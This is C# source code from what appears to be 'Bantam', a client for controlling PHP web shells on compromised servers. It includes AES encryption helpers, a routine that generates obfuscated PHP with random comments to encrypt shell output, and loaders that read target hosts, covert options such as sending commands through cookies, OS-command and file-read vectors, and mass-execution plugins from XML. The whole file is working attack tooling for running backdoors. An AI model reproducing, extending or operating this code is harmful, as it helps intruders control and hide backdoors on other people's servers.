/// <summary> /// Encrypts an array of plaintext bytes using AES-256 / "Rijndael"-256 /// </summary> /// <param name="plainText"></param> /// <param name="encryptionKey"></param> /// <param name="encryptionIV"></param> /// <returns></returns> public static string EncryptBytesToRJ256ToBase64(byte[] plainText, string encryptionKey, string encryptionIV) { string result = string.Empty; byte[] IV = Encoding.UTF8.GetBytes(encryptionIV); byte[] Key = Encoding.UTF8.GetBytes(encryptionKey); using (RijndaelManaged aes = BuildAesMode(Key, IV)) { try { using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(Key, IV), CryptoStreamMode.Write)) { cryptoStream.Write(plainText, 0, plainText.Length); cryptoStream.Close(); } result = Convert.ToBase64String(memoryStream.ToArray()); } } catch (Exception e) { LogHelper.AddGlobalLog("Failed to encrypt string - ( " + e.Message + " )", "Encryption routine failure", LogHelper.LOG_LEVEL.WARNING); } finally { aes.Clear(); } } return(result); }
/// <summary> /// /// </summary> /// <param name="ResponseEncryptionMode"></param> /// <param name="encryptionKey">Generated in this function and passed out by reference to use for decryption of the response</param> /// <param name="encryptionIV">Generated in this function and passed out by reference to use for decryption of the response</param> /// <returns></returns> public static string EncryptPhpVariableAndEcho(int ResponseEncryptionMode, ref string encryptionKey, ref string encryptionIV) { //todo make dynamic/random into config loaded once??? string varName = "$result"; encryptionIV = CryptoHelper.GetRandomEncryptionIV(); encryptionKey = CryptoHelper.GetRandomEncryptionKey(); string encryption = RandomPHPComment() + varName + " = base64_encode(" + varName + ");" + RandomPHPComment(); if (ResponseEncryptionMode == (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL) { encryption += OpenSSLEncryption(varName, encryptionKey, encryptionIV); } else if (ResponseEncryptionMode == (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT) { encryption += McryptEncryption(varName, encryptionKey, encryptionIV); } else { LogHelper.AddGlobalLog("Unknown encryption type selected.", "GUI Failure", LogHelper.LOG_LEVEL.ERROR); return(string.Empty); } encryption += RandomPHPComment(); return(encryption); }
/// <summary> /// Decodes a base64 string to a string after validating and attempting to clean it /// </summary> /// <param name="str"></param> /// <returns></returns> public static string DecodeBase64ToString(string str) { if (string.IsNullOrEmpty(str)) { return(string.Empty); } string cleanB64 = str; if (!Regex.IsMatch(str, @"^[a-zA-Z0-9\+/]*={0,2}$")) { cleanB64 = Regex.Replace(str, "[^a-zA-Z0-9+=/]", string.Empty); } try { return(Encoding.UTF8.GetString(Convert.FromBase64String(cleanB64))); } catch (Exception) { LogHelper.AddGlobalLog("Unable to decode input string with base64 (" + str + ")", "Base64 Decode failure", LogHelper.LOG_LEVEL.WARNING); return(string.Empty); } }
/// <summary> /// Decrypts an encrypted array of bytes to a string, using AES-256 / "Rijndael"-256 /// </summary> /// <param name="cipherText"></param> /// <param name="encryptionKey"></param> /// <param name="encryptionIV"></param> /// <returns></returns> public static string DecryptRJ256(byte[] cipherText, string encryptionKey, string encryptionIV) { string result = string.Empty; byte[] Key = Encoding.UTF8.GetBytes(encryptionKey); byte[] IV = Encoding.UTF8.GetBytes(encryptionIV); using (RijndaelManaged aes = BuildAesMode(Key, IV)) { try { using (MemoryStream memoryStream = new MemoryStream(cipherText)) using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(Key, IV), CryptoStreamMode.Read)) using (StreamReader streamReader = new StreamReader(cryptoStream)) { result = streamReader.ReadToEnd(); } } catch (Exception e) { LogHelper.AddGlobalLog("Failed to decrypt cipherText - ( " + e.Message + " )", "Decryption routine failure", LogHelper.LOG_LEVEL.WARNING); } finally { aes.Clear(); } } return(result); }
/// <summary> /// Loads Shells into the UI from an XML file /// </summary> /// <param name="configFile"></param> /// <returns></returns> public async static Task LoadShells(string configFile) { if (File.Exists(configFile)) { XmlDocument xmlDoc = new XmlDocument(); xmlDoc.Load(configFile); XmlNodeList itemNodes = xmlDoc.SelectNodes("//servers/server"); if (itemNodes != null && itemNodes.Count > 0) { foreach (XmlNode itemNode in itemNodes) { string hostTarget = (itemNode.Attributes?["host"] != null) ? itemNode.Attributes["host"].Value : string.Empty; string requestArg = (itemNode.Attributes?["request_arg"] != null) ? itemNode.Attributes["request_arg"].Value : string.Empty; string requestMethod = (itemNode.Attributes?["request_method"] != null) ? itemNode.Attributes["request_method"].Value : string.Empty; string ResponseEncryption = (itemNode.Attributes?["response_encryption"] != null) ? itemNode.Attributes["response_encryption"].Value : string.Empty; string ResponseEncryptionMode = (itemNode.Attributes?["response_encryption_mode"] != null) ? itemNode.Attributes["response_encryption_mode"].Value : string.Empty; string gzipRequest = (itemNode.Attributes?["gzip_request"] != null) ? itemNode.Attributes["gzip_request"].Value : string.Empty; string requestEncryption = (itemNode.Attributes?["request_encryption"] != null) ? itemNode.Attributes["request_encryption"].Value : string.Empty; string requestEncryptionKey = (itemNode.Attributes?["request_encryption_key"] != null) ? itemNode.Attributes["request_encryption_key"].Value : string.Empty; string requestEncryptionIV = (itemNode.Attributes?["request_encryption_iv"] != null) ? itemNode.Attributes["request_encryption_iv"].Value : string.Empty; string requestEncryptionIVVarName = (itemNode.Attributes?["request_encryption_iv_var_name"] != null) ? itemNode.Attributes["request_encryption_iv_var_name"].Value : string.Empty; if (string.IsNullOrEmpty(hostTarget)) { continue; } if (BantamMain.Shells.ContainsKey(hostTarget)) { continue; } if (!BantamMain.Shells.TryAdd(hostTarget, new ShellInfo())) { LogHelper.AddGlobalLog("Unable to add (" + hostTarget + ") to shells from XML", "LoadShells failure", LogHelper.LOG_LEVEL.ERROR); continue; } if (string.IsNullOrEmpty(requestArg) == false && requestArg != "command") { BantamMain.Shells[hostTarget].RequestArgName = requestArg; } if (string.IsNullOrEmpty(requestMethod) == false && requestMethod == "cookie") { BantamMain.Shells[hostTarget].SendDataViaCookie = true; } if (string.IsNullOrEmpty(ResponseEncryption) == false) { if (ResponseEncryption == "1") { BantamMain.Shells[hostTarget].ResponseEncryption = true; } else { BantamMain.Shells[hostTarget].ResponseEncryption = false; } } if (string.IsNullOrEmpty(requestEncryption) == false && requestEncryption == "1") { BantamMain.Shells[hostTarget].RequestEncryption = true; if (string.IsNullOrEmpty(requestEncryptionKey) == false) { BantamMain.Shells[hostTarget].RequestEncryptionKey = requestEncryptionKey; } if (string.IsNullOrEmpty(requestEncryptionIV) == false) { BantamMain.Shells[hostTarget].RequestEncryptionIV = requestEncryptionIV; BantamMain.Shells[hostTarget].RequestEncryptionIVRequestVarName = string.Empty; BantamMain.Shells[hostTarget].SendRequestEncryptionIV = false; } else { if (string.IsNullOrEmpty(requestEncryptionIVVarName) == false) { BantamMain.Shells[hostTarget].SendRequestEncryptionIV = true; BantamMain.Shells[hostTarget].RequestEncryptionIV = string.Empty; BantamMain.Shells[hostTarget].RequestEncryptionIVRequestVarName = requestEncryptionIVVarName; } } } if (string.IsNullOrEmpty(gzipRequest) == false) { if (gzipRequest == "1") { BantamMain.Shells[hostTarget].GzipRequestData = true; } else { BantamMain.Shells[hostTarget].GzipRequestData = false; } } else { BantamMain.Shells[hostTarget].GzipRequestData = false; } if (string.IsNullOrEmpty(ResponseEncryptionMode) == false) { if (ResponseEncryptionMode == (CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL).ToString("D")) { BantamMain.Shells[hostTarget].ResponseEncryptionMode = (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL; } else if (ResponseEncryptionMode == CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT.ToString("D")) { BantamMain.Shells[hostTarget].ResponseEncryptionMode = (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT; } } try { BantamMain.Instance.InitializeShellData(hostTarget); } catch (Exception e) { LogHelper.AddGlobalLog("Exception caught in XmlHelper.LoadShells ( " + e.Message + " )", "XML Load file Exception", LogHelper.LOG_LEVEL.INFO); } } } } else { LogHelper.AddGlobalLog("Config file (" + configFile + ") is missing.", "Failed to located XML File", LogHelper.LOG_LEVEL.ERROR); } }
/// <summary> /// Load settings, and features dynamically /// Loads dynamic OS Command, and ReadFile execution vectors from XML settings file /// </summary> /// <param name="settingsFile"></param> /// <returns></returns> public async static Task LoadSettings(string settingsFile) { if (File.Exists(settingsFile)) { XmlDocument xmlDoc = new XmlDocument(); xmlDoc.Load(settingsFile); //Loading of ReadFile methods XmlNodeList fileNodes = xmlDoc.SelectNodes("//settings/files/file"); if (fileNodes != null && fileNodes.Count > 0) { foreach (XmlNode itemNode in fileNodes) { string text = (itemNode.Attributes?["text"] != null) ? itemNode.Attributes["text"].Value : string.Empty; string file = (itemNode.Attributes?["location"] != null) ? itemNode.Attributes["location"].Value : string.Empty; bool isWindowsFile = (itemNode.Attributes?["is_windows"] != null && itemNode.Attributes?["is_windows"].Value == "1") ? true : false; BantamMain.Instance.AddReadFileOptionToGUIFromXML(file, text, isWindowsFile); } } else { LogHelper.AddGlobalLog("Could not find read file functions in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR); } //Loading of OS Command methods XmlNodeList commandNodes = xmlDoc.SelectNodes("//settings/commands/command"); if (commandNodes != null && commandNodes.Count > 0) { foreach (XmlNode itemNode in commandNodes) { string text = (itemNode.Attributes?["text"] != null) ? itemNode.Attributes["text"].Value : string.Empty; string command = (itemNode.Attributes?["command"] != null) ? itemNode.Attributes["command"].Value : string.Empty; bool isWindowsFile = (itemNode.Attributes?["is_windows"] != null && itemNode.Attributes?["is_windows"].Value == "1") ? true : false; BantamMain.Instance.AddOsCommandOptionToGUIFromXML(command, text, isWindowsFile); } } else { LogHelper.AddGlobalLog("Could not find os commands in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR); } //Loading of plugins XmlNodeList pluginNodes = xmlDoc.SelectNodes("//settings/plugins/plugin"); if (pluginNodes != null && pluginNodes.Count > 0) { foreach (XmlNode itemNode in pluginNodes) { string name = (itemNode.Attributes?["name"] != null) ? itemNode.Attributes["name"].Value : string.Empty; bool mass_execute = (itemNode.Attributes?["mass_execute"] != null && itemNode.Attributes?["mass_execute"].Value == "1") ? true : false; bool show_result = (itemNode.Attributes?["show_result"] != null && itemNode.Attributes?["show_result"].Value == "1") ? true : false; if (mass_execute) { BantamMain.Instance.AddMassExecPluginOptionToGUIFromXML(name, show_result); } else { BantamMain.Instance.AddSingleExecPluginOptionToGUIFromXML(name, show_result); } } } else { LogHelper.AddGlobalLog("Could not find plugins in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR); } } else { LogHelper.AddGlobalLog("Could not find settings file, features will be missing...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR); } }